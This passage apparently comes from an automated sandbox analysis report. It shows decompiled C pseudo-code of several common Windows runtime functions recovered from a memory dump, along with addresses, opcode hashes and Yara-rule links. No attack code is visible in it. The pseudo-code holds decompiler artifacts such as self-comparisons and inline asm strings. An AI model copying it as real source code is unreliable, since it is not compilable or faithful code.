								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E03432D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}




























                                                          0x0344ef4b
                                                          0x0344ef4d
                                                          0x0344ef57
                                                          0x0344f0bd
                                                          0x0344f0c2
                                                          0x0344f0d2
                                                          0x0344f0d2
                                                          0x0344f0c2
                                                          0x0344ef5d
                                                          0x0344ef5f
                                                          0x0344ef67
                                                          0x0344ef6a
                                                          0x0344ef6d
                                                          0x0344ef74
                                                          0x0344ef7f
                                                          0x0344ef82
                                                          0x0344ef82
                                                          0x0344ef86
                                                          0x0344ef88
                                                          0x0344ef8c
                                                          0x0344ef8f
                                                          0x0344ef8f
                                                          0x0344ef8f
                                                          0x00000000
                                                          0x0344ef91
                                                          0x0344ef93
                                                          0x0344efc4
                                                          0x0344efc4
                                                          0x0344efc4
                                                          0x0344efca
                                                          0x0344efd0
                                                          0x0344f0a6
                                                          0x00000000
                                                          0x00000000
                                                          0x0344f0af
                                                          0x0349bb06
                                                          0x0349bb0a
                                                          0x0344f0b5
                                                          0x0344f0b5
                                                          0x0344f0b5
                                                          0x0344f0b5
                                                          0x00000000
                                                          0x0344efd6
                                                          0x0344efd9
                                                          0x0344f0de
                                                          0x0344f0e2
                                                          0x0344efdf
                                                          0x0344efdf
                                                          0x0344efdf
                                                          0x0344efe5
                                                          0x0349bafc
                                                          0x0349bafc
                                                          0x0344efe5
                                                          0x0344efeb
                                                          0x0344efed
                                                          0x0344f00f
                                                          0x0344f011
                                                          0x0344f01a
                                                          0x0344f01d
                                                          0x0344f021
                                                          0x0344f028
                                                          0x0344f029
                                                          0x0344f029
                                                          0x0344f02c
                                                          0x00000000
                                                          0x0344f02c
                                                          0x0344eff3
                                                          0x0344eff9
                                                          0x0344f0ea
                                                          0x0344f0ed
                                                          0x0344f0ef
                                                          0x00000000
                                                          0x0344f0ef
                                                          0x0344f003
                                                          0x0349bb12
                                                          0x0344f045
                                                          0x0344f049
                                                          0x0344f051
                                                          0x0344f09e
                                                          0x0344f0a0
                                                          0x0344f0a0
                                                          0x0344f09e
                                                          0x0344f053
                                                          0x0344f064
                                                          0x0344f064
                                                          0x0344f06b
                                                          0x0349bb1a
                                                          0x0349bb1a
                                                          0x0344f071
                                                          0x0344f071
                                                          0x0344f07d
                                                          0x0344f082
                                                          0x0344f08f
                                                          0x0344f08f
                                                          0x0344f009
                                                          0x0344f00d
                                                          0x00000000
                                                          0x0344f00d
                                                          0x0344efd0
                                                          0x0344ef97
                                                          0x0344efa5
                                                          0x0344efaa
                                                          0x00000000
                                                          0x0344efac
                                                          0x0344efac
                                                          0x0344efac
                                                          0x00000000
                                                          0x0344efb2
                                                          0x0344f036
                                                          0x0344f03a
                                                          0x0344f040
                                                          0x0344f090
                                                          0x00000000
                                                          0x0344f092
                                                          0x0344f042
                                                          0x00000000
                                                          0x0344f042
                                                          0x0344efb7
                                                          0x0344efb9
                                                          0x0344efbc
                                                          0x0344efb0
                                                          0x0344efb0
                                                          0x00000000
                                                          0x0344efbe
                                                          0x0344efbe
                                                          0x0344efc1
                                                          0x00000000
                                                          0x0344efc1
                                                          0x0344efbc
                                                          0x0344efaa
                                                          0x0344ef91

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                          • Instruction ID: 8fa8eb374c18d08ae74e87620c2fdf9a72cbbe737cad44bac1b6804357bf72e4
                                                          • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                          • Instruction Fuzzy Hash: 1F51D030A04349AFFB24CB69C190BAFFBB1BF45314F1881BAD4559B381C375A989C759
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0350740D, Relevance: .1, Instructions: 141COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 84%
                                                          			E0350740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E0348D4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E0347F380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L03454620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L03454620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E0347F3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L03454620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}





















                                                          0x0350740d
                                                          0x0350740d
                                                          0x03507412
                                                          0x03507413
                                                          0x03507416
                                                          0x03507418
                                                          0x0350741c
                                                          0x0350741f
                                                          0x03507422
                                                          0x03507422
                                                          0x03507428
                                                          0x0350742a
                                                          0x0350742a
                                                          0x03507451
                                                          0x03507432
                                                          0x0350744f
                                                          0x0350744f
                                                          0x00000000
                                                          0x03507434
                                                          0x03507438
                                                          0x03507443
                                                          0x03507517
                                                          0x03507517
                                                          0x0350751a
                                                          0x03507535
                                                          0x03507520
                                                          0x03507527
                                                          0x0350752c
                                                          0x03507531
                                                          0x03507533
                                                          0x00000000
                                                          0x03507533
                                                          0x00000000
                                                          0x03507531
                                                          0x0350754b
                                                          0x0350754f
                                                          0x0350755c
                                                          0x0350755c
                                                          0x0350755f
                                                          0x03507560
                                                          0x03507561
                                                          0x03507562
                                                          0x03507563
                                                          0x03507568
                                                          0x0350756a
                                                          0x0350756c
                                                          0x0350756d
                                                          0x0350756d
                                                          0x0350756f
                                                          0x03507572
                                                          0x03507574
                                                          0x03507577
                                                          0x0350757c
                                                          0x0350757f
                                                          0x00000000
                                                          0x03507551
                                                          0x03507551
                                                          0x03507551
                                                          0x03507553
                                                          0x03507553
                                                          0x03507449
                                                          0x03507449
                                                          0x0350744c
                                                          0x0350744c
                                                          0x00000000
                                                          0x0350744c
                                                          0x03507443
                                                          0x0350750e
                                                          0x03507514
                                                          0x03507514
                                                          0x03507455
                                                          0x03507469
                                                          0x0350746d
                                                          0x00000000
                                                          0x03507473
                                                          0x03507473
                                                          0x03507476
                                                          0x03507480
                                                          0x03507484
                                                          0x0350748e
                                                          0x03507493
                                                          0x03507493
                                                          0x03507496
                                                          0x03507499
                                                          0x035074a1
                                                          0x035074b1
                                                          0x035074b5
                                                          0x00000000
                                                          0x035074bb
                                                          0x035074c1
                                                          0x035074c1
                                                          0x035074c4
                                                          0x035074c5
                                                          0x035074c6
                                                          0x035074c7
                                                          0x035074c8
                                                          0x035074cd
                                                          0x00000000
                                                          0x035074d3
                                                          0x035074d3
                                                          0x035074d6
                                                          0x035074d8
                                                          0x035074db
                                                          0x035074dd
                                                          0x035074e0
                                                          0x035074e7
                                                          0x035074ee
                                                          0x035074ee
                                                          0x035074f4
                                                          0x035074f9
                                                          0x00000000
                                                          0x035074fb
                                                          0x035074fb
                                                          0x035074fd
                                                          0x03507500
                                                          0x03507503
                                                          0x03507505
                                                          0x03507505
                                                          0x035074f9
                                                          0x00000000
                                                          0x035074cd
                                                          0x035074b5
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                          • Instruction ID: a30a080f717fa987d5bccceac49f70a35b0809623f429e6450cc810a3e640578
                                                          • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                          • Instruction Fuzzy Hash: 35518071600606EFCB15CF55D480A96FBF5FF49304F19C5AAE9089F262E372E946CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 03462990, Relevance: .1, Instructions: 133COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 97%
                                                          			E03462990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x350ff00);
				E0348D08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x3411664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E0347E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x3411668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E034B51BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x341166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E03462AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E03446600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E03462C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E0344EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E03462AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E03462C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E03462ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E0348D0D1(_t62);
				goto L28;
			}





















                                                          0x03462990
                                                          0x03462992
                                                          0x03462997
                                                          0x034629a3
                                                          0x034629a6
                                                          0x034629ab
                                                          0x034629ad
                                                          0x034629b2
                                                          0x034a5c80
                                                          0x034629b8
                                                          0x034629b8
                                                          0x034629bb
                                                          0x034629c0
                                                          0x034629c5
                                                          0x034629c6
                                                          0x034629c6
                                                          0x034629cb
                                                          0x00000000
                                                          0x00000000
                                                          0x034629cd
                                                          0x034629d0
                                                          0x034629d9
                                                          0x034629db
                                                          0x034629dd
                                                          0x03462a7f
                                                          0x03462a84
                                                          0x03462a87
                                                          0x03462a89
                                                          0x034a5ca1
                                                          0x034a5ca3
                                                          0x00000000
                                                          0x03462a8f
                                                          0x03462a8f
                                                          0x00000000
                                                          0x03462a8f
                                                          0x00000000
                                                          0x034629e3
                                                          0x034629e3
                                                          0x034629e3
                                                          0x00000000
                                                          0x034629e3
                                                          0x034629dd
                                                          0x00000000
                                                          0x034629db
                                                          0x034629e6
                                                          0x034629e9
                                                          0x034629eb
                                                          0x034629ed
                                                          0x034629f3
                                                          0x034629f5
                                                          0x034629f8
                                                          0x034629fa
                                                          0x03462a97
                                                          0x03462a9a
                                                          0x03462a9d
                                                          0x03462add
                                                          0x00000000
                                                          0x03462a9f
                                                          0x03462aa2
                                                          0x03462aa5
                                                          0x03462aa8
                                                          0x03462aab
                                                          0x034a5cab
                                                          0x034a5caf
                                                          0x034a5cc5
                                                          0x034a5cda
                                                          0x034a5cdc
                                                          0x034a5cdf
                                                          0x034a5ce5
                                                          0x00000000
                                                          0x034a5ceb
                                                          0x034a5ced
                                                          0x034a5cee
                                                          0x00000000
                                                          0x034a5cee
                                                          0x034a5cb1
                                                          0x034a5cb4
                                                          0x034a5cb9
                                                          0x034a5cbb
                                                          0x00000000
                                                          0x034a5cbd
                                                          0x034a5cbd
                                                          0x00000000
                                                          0x034a5cbd
                                                          0x034a5cbb
                                                          0x03462ab1
                                                          0x03462ab1
                                                          0x03462ac4
                                                          0x03462ac6
                                                          0x03462ac6
                                                          0x00000000
                                                          0x03462ac6
                                                          0x03462aab
                                                          0x00000000
                                                          0x03462a00
                                                          0x03462a09
                                                          0x03462a0e
                                                          0x03462a21
                                                          0x03462a24
                                                          0x03462a35
                                                          0x03462a3a
                                                          0x03462a3d
                                                          0x03462a42
                                                          0x03462a59
                                                          0x03462a59
                                                          0x03462a5c
                                                          0x03462a5f
                                                          0x03462a5f
                                                          0x034629fa
                                                          0x034629f3
                                                          0x03462a64
                                                          0x03462a64
                                                          0x03462a6b
                                                          0x03462a6b
                                                          0x03462a6d
                                                          0x03462a72
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 72a9370ca47f4e11e7d2d4e4ca5645dec6224d77c88578cc99139afa90760f7a
                                                          • Instruction ID: 15988bdb8f771c77d660fea07e68a3d87aacbf5632e4369e12db23e59574aee9
                                                          • Opcode Fuzzy Hash: 72a9370ca47f4e11e7d2d4e4ca5645dec6224d77c88578cc99139afa90760f7a
                                                          • Instruction Fuzzy Hash: 54514671A0020AAFCF25DF55C880ADEBBB5FF48310F14845AE910AF360C3B59952CF99
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 03464BAD, Relevance: .1, Instructions: 131COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 85%
                                                          			E03464BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x352d360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E0343CC50(_t86);
					L11:
					return E0347B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x3528504
				E03452280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E0347FA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E0347B0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L034577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L03454620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E0343CCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x3528504
								E0344FFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L034577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E03464F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}


























                                                          0x03464bad
                                                          0x03464bbf
                                                          0x03464bc2
                                                          0x03464bc6
                                                          0x03464bcd
                                                          0x03464bd9
                                                          0x034a67fe
                                                          0x034a6800
                                                          0x03464ccc
                                                          0x03464ccd
                                                          0x03464cb7
                                                          0x03464cc9
                                                          0x03464cc9
                                                          0x03464bdf
                                                          0x03464be5
                                                          0x00000000
                                                          0x00000000
                                                          0x03464beb
                                                          0x03464bef
                                                          0x00000000
                                                          0x00000000
                                                          0x03464bf5
                                                          0x03464bf9
                                                          0x03464c06
                                                          0x03464c0b
                                                          0x03464c17
                                                          0x03464c1c
                                                          0x03464c1f
                                                          0x03464c25
                                                          0x03464c33
                                                          0x03464c3d
                                                          0x03464c40
                                                          0x03464c43
                                                          0x03464c47
                                                          0x03464c4d
                                                          0x03464c53
                                                          0x03464c54
                                                          0x03464c55
                                                          0x03464c56
                                                          0x03464c5b
                                                          0x03464c5c
                                                          0x03464c63
                                                          0x03464c6b
                                                          0x00000000
                                                          0x00000000
                                                          0x034a6776
                                                          0x034a6784
                                                          0x034a6784
                                                          0x034a679f
                                                          0x034a67a7
                                                          0x034a67af
                                                          0x034a67ce
                                                          0x00000000
                                                          0x034a67b1
                                                          0x034a67b7
                                                          0x034a67b8
                                                          0x034a67c1
                                                          0x034a67d3
                                                          0x034a67d9
                                                          0x034a67dd
                                                          0x03464c94
                                                          0x03464c94
                                                          0x03464c98
                                                          0x03464c9c
                                                          0x03464ca3
                                                          0x034a67f4
                                                          0x034a67f4
                                                          0x03464cb5
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x03464cb5
                                                          0x03464c79
                                                          0x03464c7e
                                                          0x03464c89
                                                          0x03464c8b
                                                          0x03464c8f
                                                          0x03464c8f
                                                          0x00000000
                                                          0x03464c89
                                                          0x034a67c3
                                                          0x00000000
                                                          0x034a67c3
                                                          0x034a67af
                                                          0x03464c73
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: faada51ccd1feccc7f2386ecc315fb53188df17b5f9c8cbead4ebcc87dad8bac
                                                          • Instruction ID: cda0cad3d89fd91c071d361a1854e7f7529d1074ab5f4480ebc7cdfb5beaf0b3
                                                          • Opcode Fuzzy Hash: faada51ccd1feccc7f2386ecc315fb53188df17b5f9c8cbead4ebcc87dad8bac
                                                          • Instruction Fuzzy Hash: A2418739A006189FCF21DF69C940BEA77B8EF45710F0500ABE908AF341D7749E85CB99
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 03464D3B, Relevance: .1, Instructions: 131COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 78%
                                                          			E03464D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x352d360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E0347FA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x3527bc8 != 0) {
					L3:
					while(1) {
